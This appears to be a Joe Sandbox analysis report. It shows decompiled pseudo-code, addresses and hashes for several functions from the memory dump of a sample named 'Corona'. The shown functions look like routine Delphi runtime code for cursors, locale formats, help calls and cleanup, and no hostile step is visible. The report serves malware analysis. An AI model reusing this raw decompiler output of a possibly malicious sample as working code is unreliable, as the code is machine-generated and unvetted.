                                  0x00439218
                                  0x0043921d
                                  0x00439223
                                  0x00439229
                                  0x0043922d
                                  0x00439236
                                  0x00439236
                                  0x00000000
                                  0x00439204
                                  0x004391b5
                                  0x00439295
                                  0x0043929a
                                  0x004392a8
                                  0x004392aa
                                  0x004392ac
                                  0x00000000
                                  0x00000000
                                  0x004392b2
                                  0x004392b6
                                  0x004392ca
                                  0x004392ce
                                  0x00000000
                                  0x00000000
                                  0x004392f0
                                  0x004392f5
                                  0x004392f7
                                  0x004392fc
                                  0x00439302
                                  0x00439307
                                  0x00439309
                                  0x00439310
                                  0x00439310
                                  0x00439309
                                  0x00439316
                                  0x00439319
                                  0x00439320
                                  0x00439326
                                  0x0043932a
                                  0x00439335
                                  0x00439335
                                  0x0043932a
                                  0x00000000
                                  0x00439320
                                  0x004392c0
                                  0x00000000
                                  0x004391bb

                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004393B4
                                  • SetCursor.USER32(00000000,?,00000000,0043954C), ref: 00439446
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Cursor
                                  • String ID: 6D
                                  • API String ID: 3268636600-480018528
                                  • Opcode ID: ee9d473c8e3c4813df8d52c0cdfd67e3f8d59963d1fc248462995df78abf26a4
                                  • Instruction ID: 2632150d836bcf531531a7b503c8239585164110d7f8166e3685c7fb5193565f
                                  • Opcode Fuzzy Hash: ee9d473c8e3c4813df8d52c0cdfd67e3f8d59963d1fc248462995df78abf26a4
                                  • Instruction Fuzzy Hash: 23C18031A00219DFCB15EFA9C58599FB7F1BF08304F5455AAE801AB355D7B8EE81CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044EBAC, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0044EBAC(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t270;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t279;
				intOrPtr* _t306;
				intOrPtr _t307;
				void* _t314;

				_t313 = _t314;
				_push(__ebx);
				_push(__esi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t270 =  *0x444a2c; // 0x444a30
				E004047B8( &_v100, _t270);
				_t250 =  &_v8;
				_push(_t314);
				_push(0x44ef32);
				_push( *[fs:eax]);
				 *[fs:eax] = _t314 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E00444DE4() == 0 || E0044C42C(E0042D0A0( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0044E914( *_t250);
					} else {
						E0044E71C( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0044E94C();
					_v84 = E0044B7F0();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0042E194( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t320 = _t306;
					if(_t306 == 0) {
						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
						_t279 =  *0x42abf0; // 0x42ac3c
						_t166 = E00403288(_t307, _t279);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t307 + 0x190);
							if( *(_t307 + 0x190) != 0) {
								ClientToScreen( *(_t307 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t306 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0042E338( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E0044C3F4( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E0042B914(_v148,  &_v140,  &_v144, _t320);
					E00403EE4( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x450c18; // 0x42b294
					_v96 = _t188;
					_v40 = 0;
					_v33 = E0042F98C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t285 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t327 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0044EAA0(_v96, _t285, _t313);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004032F8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
							_t238 = E0044EB00(_v44, _t250, 0xffc8, _t313) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0042E30C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0042E30C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0042E984( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E0044C540(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0044E71C( *_t250, 1, _v48);
						} else {
							E0044E71C( *_t250, 0, _t231);
						}
						L26:
						_pop(_t271);
						 *[fs:eax] = _t271;
						_push(0x44ef39);
						E00403E70( &_v148, 2);
						_t273 =  *0x444a2c; // 0x444a30
						return E00404888( &_v100, _t273);
					}
				}
			}












































                                  0x0044ebad
                                  0x0044ebb5
                                  0x0044ebb6
                                  0x0044ebba
                                  0x0044ebc0
                                  0x0044ebcb
                                  0x0044ebcc
                                  0x0044ebcd
                                  0x0044ebd3
                                  0x0044ebd9
                                  0x0044ebde
                                  0x0044ebe3
                                  0x0044ebe4
                                  0x0044ebe9
                                  0x0044ebec
                                  0x0044ebf1
                                  0x0044ebfe
                                  0x0044eeeb
                                  0x0044eeeb
                                  0x0044eeee
                                  0x0044eef0
                                  0x0044ef01
                                  0x0044eef2
                                  0x0044eef8
                                  0x0044eef8
                                  0x00000000
                                  0x0044ec37
                                  0x0044ec3c
                                  0x0044ec42
                                  0x0044ec48
                                  0x0044ec50
                                  0x0044ec5d
                                  0x0044ec65
                                  0x0044ec70
                                  0x0044ec7b
                                  0x0044ec7c
                                  0x0044ec7d
                                  0x0044ec7e
                                  0x0044ec89
                                  0x0044ec8e
                                  0x0044ec93
                                  0x0044ec9b
                                  0x0044ec9e
                                  0x0044eca0
                                  0x0044ecb0
                                  0x0044ecb5
                                  0x0044ecbb
                                  0x0044ecc0
                                  0x0044ecc2
                                  0x0044ecc4
                                  0x0044eccb
                                  0x0044ecd8
                                  0x0044ecd8
                                  0x0044eccb
                                  0x0044eca2
                                  0x0044eca9
                                  0x0044eca9
                                  0x0044ecef
                                  0x0044ed02
                                  0x0044ed0d
                                  0x0044ed16
                                  0x0044ed24
                                  0x0044ed35
                                  0x0044ed43
                                  0x0044ed4a
                                  0x0044ed52
                                  0x0044ed55
                                  0x0044ed5a
                                  0x0044ed5f
                                  0x0044ed79
                                  0x0044ed81
                                  0x0044eda1
                                  0x0044eda1
                                  0x0044edab
                                  0x0044edb5
                                  0x0044edb9
                                  0x0044edb9
                                  0x0044edb9
                                  0x0044edbb
                                  0x0044edbd
                                  0x0044edc6
                                  0x00000000
                                  0x0044edcc
                                  0x0044edcc
                                  0x0044edd0
                                  0x00000000
                                  0x00000000
                                  0x0044edda
                                  0x0044edf2
                                  0x0044ee0d
                                  0x0044ee1f
                                  0x0044ee37
                                  0x0044ee43
                                  0x0044ee46
                                  0x0044ee49
                                  0x0044ee49
                                  0x0044ee5a
                                  0x0044ee5f
                                  0x0044ee67
                                  0x0044ee70
                                  0x0044ee81
                                  0x0044ee86
                                  0x0044ee8e
                                  0x0044ee97
                                  0x0044eea5
                                  0x0044eebe
                                  0x0044eec4
                                  0x0044eec9
                                  0x0044eece
                                  0x0044eee4
                                  0x0044eed0
                                  0x0044eed6
                                  0x0044eed6
                                  0x0044ef06
                                  0x0044ef08
                                  0x0044ef0b
                                  0x0044ef0e
                                  0x0044ef1e
                                  0x0044ef26
                                  0x0044ef31
                                  0x0044ef31
                                  0x0044edc6

                                  APIs
                                    • Part of subcall function 00444DE4: GetActiveWindow.USER32 ref: 00444DE7
                                    • Part of subcall function 00444DE4: GetCurrentThreadId.KERNEL32 ref: 00444DFC
                                    • Part of subcall function 00444DE4: 72E7AC10.USER32(00000000,00444DC4), ref: 00444E02
                                    • Part of subcall function 0044E94C: GetCursor.USER32(?), ref: 0044E967
                                    • Part of subcall function 0044E94C: GetIconInfo.USER32(00000000,?), ref: 0044E96D
                                  • ClientToScreen.USER32(?,?), ref: 0044ECD8
                                  • OffsetRect.USER32(?,?,?), ref: 0044ECEF
                                  • OffsetRect.USER32(?,?,?), ref: 0044EE1F
                                    • Part of subcall function 0044E71C: SetTimer.USER32(00000000,00000000,?,0044C44C), ref: 0044E736
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                  • String ID: 0JD
                                  • API String ID: 3022406661-2685214340
                                  • Opcode ID: d95c4774388ab0daf6f617a9a74d9c01cc3b7b2a8e59d8ab9bc4e7e5aee60bd6
                                  • Instruction ID: 14a0fe05bb4a6c9a4aa746b2be83ddc1411c586ffd3bc93be4c36b6e8a0b5743
                                  • Opcode Fuzzy Hash: d95c4774388ab0daf6f617a9a74d9c01cc3b7b2a8e59d8ab9bc4e7e5aee60bd6
                                  • Instruction Fuzzy Hash: 7DC10435A006188FDB10DFA9C880A9EB7F5FF09304F5581AAE504EB366DB34AD49CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD34, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040AD34(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40aefe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E4C(__edx);
				E0040A9FC(GetThreadLocale(), 0x40af14, 0x1009,  &_v12);
				if(E00407DB8(0x40af14, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E0040410C(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x45010c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004083B0(_t124 + _t92 - 1, 2, 0x40af18);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004083B0(_t124 + _t92 - 1, 4, 0x40af28);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004083B0(_t124 + _t92 - 1, 2, 0x40af40);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404114(_t122, 0x40af58);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404034();
												E00404114(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404114(_t122, 0x40af4c);
										_t92 = _t92 + 1;
									}
								} else {
									E00404114(_t122, 0x40af38);
									_t92 = _t92 + 3;
								}
							} else {
								E00404114(_t122, 0x40af24);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040BDA4(_t124, _t92);
							E0040436C(_t124, _v8, _t92,  &_v20);
							E00404114(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x452744; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EA0(_t122, _t124);
					} else {
						while(_t92 <= E0040410C(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404034();
									E00404114(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040AF05);
				return E00403E70( &_v24, 4);
			}























                                  0x0040ad34
                                  0x0040ad39
                                  0x0040ad3a
                                  0x0040ad3b
                                  0x0040ad3c
                                  0x0040ad3d
                                  0x0040ad41
                                  0x0040ad43
                                  0x0040ad47
                                  0x0040ad48
                                  0x0040ad4d
                                  0x0040ad50
                                  0x0040ad53
                                  0x0040ad5a
                                  0x0040ad72
                                  0x0040ad8a
                                  0x0040aed4
                                  0x0040aed6
                                  0x0040aedb
                                  0x0040aedd
                                  0x00000000
                                  0x00000000
                                  0x0040adf3
                                  0x0040adf8
                                  0x0040adff
                                  0x0040ae3d
                                  0x0040ae42
                                  0x0040ae44
                                  0x0040ae63
                                  0x0040ae68
                                  0x0040ae6a
                                  0x0040ae8b
                                  0x0040ae90
                                  0x0040ae92
                                  0x0040aea7
                                  0x0040aea7
                                  0x0040aea9
                                  0x0040aeaf
                                  0x0040aeb6
                                  0x0040aeab
                                  0x0040aeab
                                  0x0040aead
                                  0x0040aec4
                                  0x0040aece
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040aead
                                  0x0040ae94
                                  0x0040ae9b
                                  0x0040aea0
                                  0x0040aea0
                                  0x0040ae6c
                                  0x0040ae73
                                  0x0040ae78
                                  0x0040ae78
                                  0x0040ae46
                                  0x0040ae4d
                                  0x0040ae52
                                  0x0040ae52
                                  0x0040aed3
                                  0x0040aed3
                                  0x0040ae01
                                  0x0040ae0a
                                  0x0040ae18
                                  0x0040ae22
                                  0x0040ae27
                                  0x0040ae27
                                  0x0040adff
                                  0x0040ad90
                                  0x0040ad90
                                  0x0040ad95
                                  0x0040ad98
                                  0x0040ada6
                                  0x0040ada2
                                  0x0040ada2
                                  0x0040ada2
                                  0x0040adaa
                                  0x0040ade5
                                  0x0040adac
                                  0x0040add1
                                  0x0040adb2
                                  0x0040adb2
                                  0x0040adb4
                                  0x0040adb6
                                  0x0040adb8
                                  0x0040adc1
                                  0x0040adcb
                                  0x0040adcb
                                  0x0040adb8
                                  0x0040add0
                                  0x0040add0
                                  0x0040add0
                                  0x0040addc
                                  0x0040adaa
                                  0x0040aee3
                                  0x0040aee5
                                  0x0040aee8
                                  0x0040aeeb
                                  0x0040aefd

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040AEFE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040AD63
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 56457dd0aded12b185d039f6b6f6fc95ca0564812ebc5c96a98f8ff01f4a4015
                                  • Instruction ID: 085d6218f6d344d443898964295cb586d748297af314c1f8b1c85b88ffd8fa5a
                                  • Opcode Fuzzy Hash: 56457dd0aded12b185d039f6b6f6fc95ca0564812ebc5c96a98f8ff01f4a4015
                                  • Instruction Fuzzy Hash: 2A4107B07043064BC711EB65C8822BFB296DFD4304B10443BA541BB7D2EA3CDD1296AF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00428DD0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00428DD0(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t33;
				long _t46;
				CHAR* _t48;
				void* _t55;
				intOrPtr _t67;
				void* _t74;
				char _t76;
				void* _t79;

				_t74 = __edi;
				_t78 = _t79;
				_push(__ebx);
				_push(__esi);
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_t76 = __edx;
				_t55 = __eax;
				_push(_t79);
				_push(0x428ec8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe4;
				_t81 = __edx;
				if(__edx == 0) {
					E0040B274(0x428970, 1);
					E00403888();
				}
				_v28 = _t76;
				_v24 = 0xb;
				E00428B1C(_t55, _t55,  &_v32, 0, _t74, _t76);
				_v20 = _v32;
				_v16 = 0xb;
				E00408938("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
				_t33 = E00429460(_t55, _t74, _t78, _t81);
				_t82 = _t33;
				if(_t33 != 0) {
					E00428B1C(_t55, _t55,  &_v12, 0, _t74, _t76);
					if(E004293B8(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
						 *((char*)(_t55 + 0x10)) = 1;
						E00403EA0(_t55 + 0x14, _v8);
						_t46 = E0040430C(_v8);
						_t48 = E0040430C(_v12);
						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x428ecf);
				E00403E4C( &_v32);
				return E00403E70( &_v12, 2);
			}


















                                  0x00428dd0
                                  0x00428dd1
                                  0x00428dd6
                                  0x00428dd7
                                  0x00428dda
                                  0x00428ddd
                                  0x00428de0
                                  0x00428de3
                                  0x00428de5
                                  0x00428de9
                                  0x00428dea
                                  0x00428def
                                  0x00428df2
                                  0x00428df5
                                  0x00428df7
                                  0x00428e05
                                  0x00428e0a
                                  0x00428e0a
                                  0x00428e13
                                  0x00428e16
                                  0x00428e21
                                  0x00428e29
                                  0x00428e2c
                                  0x00428e3d
                                  0x00428e44
                                  0x00428e49
                                  0x00428e4b
                                  0x00428e54
                                  0x00428e69
                                  0x00428e71
                                  0x00428e7b
                                  0x00428e83
                                  0x00428e91
                                  0x00428ea0
                                  0x00428ea0
                                  0x00428e69
                                  0x00428ea7
                                  0x00428eaa
                                  0x00428ead
                                  0x00428eb5
                                  0x00428ec7

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Help
                                  • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$d&E$@B
                                  • API String ID: 2830496658-687985326
                                  • Opcode ID: 3a757cc33a4ce42f065446dacb6df0ab27d1374880d65cf39d622fc947cd6dce
                                  • Instruction ID: 8534f94596467151efe14ad8bf1206272215468322af3bb2306d355280946b1e
                                  • Opcode Fuzzy Hash: 3a757cc33a4ce42f065446dacb6df0ab27d1374880d65cf39d622fc947cd6dce
                                  • Instruction Fuzzy Hash: B7316670B002149BDB04EFA5D851A9EBBB9EF48304F91457EF800E7382DB789E058799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004231B8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E004231B8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x423281);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x452890 =  *0x452890 + 1;
				if( *0x452890 == 0) {
					_t3 =  *0x4528e8; // 0x2130aa8
					E004030FC(_t3);
					_t5 =  *0x4506cc; // 0x21339ec
					E004030FC(_t5);
					_t7 =  *0x4506c8; // 0x2133b04
					E004030FC(_t7);
					E004202D0(__ebx, _t27);
					_t10 =  *0x4506d0; // 0x2130acc
					E004030FC(_t10);
					_t12 =  *0x4528e4; // 0x2130b08
					E004030FC(_t12);
					_t14 =  *0x4528d8; // 0x2130a30
					E004030FC(_t14);
					_t16 =  *0x4528dc; // 0x2130a58
					E004030FC(_t16);
					_t18 =  *0x4528e0; // 0x2130a80
					E004030FC(_t18);
					_t20 =  *0x45288c; // 0xa8080a0b
					DeleteObject(_t20);
					_push(0x4528a8);
					L00405E34();
					_push(0x4528c0);
					L00405E34();
					_t34 =  *0x412278; // 0x41227c
					E004048D4(0x4505e8, 0x12, _t34);
					_t35 =  *0x412278; // 0x41227c
					E004048D4(0x450448, 0x34, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x423288);
				return 0;
			}

















                                  0x004231b8
                                  0x004231bd
                                  0x004231be
                                  0x004231c3
                                  0x004231c6
                                  0x004231c9
                                  0x004231cf
                                  0x004231d5
                                  0x004231da
                                  0x004231df
                                  0x004231e4
                                  0x004231e9
                                  0x004231ee
                                  0x004231f3
                                  0x004231f8
                                  0x004231fd
                                  0x00423202
                                  0x00423207
                                  0x0042320c
                                  0x00423211
                                  0x00423216
                                  0x0042321b
                                  0x00423220
                                  0x00423225
                                  0x0042322a
                                  0x00423230
                                  0x00423235
                                  0x0042323a
                                  0x0042323f
                                  0x00423244
                                  0x00423253
                                  0x00423259
                                  0x00423268
                                  0x0042326e
                                  0x0042326e
                                  0x00423275
                                  0x00423278
                                  0x0042327b
                                  0x00423280

                                  APIs
                                  • DeleteObject.GDI32(A8080A0B), ref: 00423230
                                  • RtlDeleteCriticalSection.KERNEL32(004528A8,A8080A0B,00000000,00423281), ref: 0042323A
                                  • RtlDeleteCriticalSection.KERNEL32(004528C0,004528A8,A8080A0B,00000000,00423281), ref: 00423244
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Delete$CriticalSection$Object
                                  • String ID: |"A
                                  • API String ID: 378701848-79920896
                                  • Opcode ID: 4022fc7ed0d5e980474f717a32cd62e73d97c1f8dd6fd59c19e4eb525cbdc8f1
                                  • Instruction ID: 7ff0270cd9c17a7ec8594388005b9095b7a43081d402d3bae0dd43b380dd6274
                                  • Opcode Fuzzy Hash: 4022fc7ed0d5e980474f717a32cd62e73d97c1f8dd6fd59c19e4eb525cbdc8f1
                                  • Instruction Fuzzy Hash: C2013034209284DFE700FF69ED4391937A8E741306750867BB500AB6B7CABDDD119B2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004238EC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004238EC(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x452922 != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x452900; // 0x4238ec
					 *0x452900 = E0042377C(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x452900(_t14, _t17);
				}
				return _t19;
			}












                                  0x004238f2
                                  0x004238f5
                                  0x004238ff
                                  0x00423924
                                  0x0042392d
                                  0x00423954
                                  0x00423954
                                  0x00423901
                                  0x00423906
                                  0x00423913
                                  0x00423920
                                  0x00423920
                                  0x0042395f

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042393D
